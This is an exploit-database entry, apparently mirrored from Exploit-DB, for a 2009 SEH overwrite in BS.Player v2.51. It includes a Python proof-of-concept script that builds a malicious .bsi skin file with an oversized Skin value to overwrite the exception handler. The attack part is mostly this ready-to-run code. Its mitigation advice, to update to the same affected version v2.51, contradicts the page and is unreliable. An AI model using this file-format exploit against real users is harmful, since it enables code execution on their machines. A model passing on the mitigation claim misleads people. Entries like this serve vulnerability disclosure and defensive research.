header-logo
Suggest Exploit
vendor:
BS.Player
by:
Mert Sarica
9,3
CVSS
HIGH
SEH Overwrite Vulnerability
119
CWE
Product Name: BS.Player
Affected Version From: v2.51
Affected Version To: v2.51
Patch Exists: YES
Related CWE: N/A
CPE: a:bsplayer:bs.player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

BS.Player v2.51

A SEH overwrite vulnerability exists in BS.Player v2.51. An attacker can exploit this vulnerability by creating a malicious .bsi file containing a specially crafted Skin option with a large number of 'A' characters followed by four 'B' characters and four 'C' characters. When the file is opened, the SEH handler will be overwritten with the 'C' characters, allowing the attacker to execute arbitrary code.

Mitigation:

Users should update to the latest version of BS.Player v2.51 to mitigate this vulnerability.
Source

Exploit-DB raw data:

# BS.Player v2.51
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# SEH Overwrite Vulnerability
# http://www.mertsarica.com

junk = "[Options]\nSkin="

vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4

try: 
   vulnerable = open("vulnerable.bsi",'w') 
   vulnerable.write(vulnerability) 
   vulnerable.close() 
   print "Vulnerable file created!\n"
except: 
   print "Error occured!"

Navigation

Suggest Exploit

Services By CQR